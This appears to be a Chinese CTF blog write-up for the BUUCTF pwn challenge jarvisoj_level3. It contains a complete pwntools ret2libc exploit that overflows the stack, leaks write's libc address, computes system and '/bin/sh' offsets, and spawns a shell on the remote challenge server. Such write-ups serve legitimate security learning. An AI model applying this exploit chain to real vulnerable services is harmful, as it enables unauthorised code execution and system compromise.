BUUCTF--pwn--jarvisoj_level3【ret2libc】

保护

b3e9833ee55c4440ab2286b6ef8b3aec.png

ida

cdeb9730f221427f98f2a4bd5d0c35c0.png

 e52d271ea7174b3e8aadbcd2c5bc785f.png

 没有system和/bin/sh,典型ret2libc

exp

from pwn import*
from LibcSearcher3 import*
context.log_level="debug"
elf=ELF("/home/error/桌面/level3")

#i=process("/home/error/桌面/level3")
i=remote("node4.buuoj.cn",27813)
print("+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++")
write_plt=elf.plt["write"]
write_got=elf.got["write"]
main=elf.symbols["main"]

p1=cyclic(0x88+4)+flat([write_plt,main,1,write_got,4])#注意write的三个参数

i.sendlineafter("Input:\n",p1)
write_addr=u32(i.recv(4))
print(hex(write_addr))
print("++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++")
libc=LibcSearcher("write",write_addr)
libc_base=write_addr-libc.dump("write")
sys_addr=libc_base+libc.dump("system")
sh_addr=libc_base+libc.dump("str_bin_sh")

p2=cyclic(0x88+4)+flat([sys_addr,0,sh_addr])

i.sendlineafter("Input:\n",p2)

i.interactive()








不知道为什么用libcsearcher远端和本地的libc版本不一样,本地打得通远端打不通,用了个libcsearcher3才打通远端

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值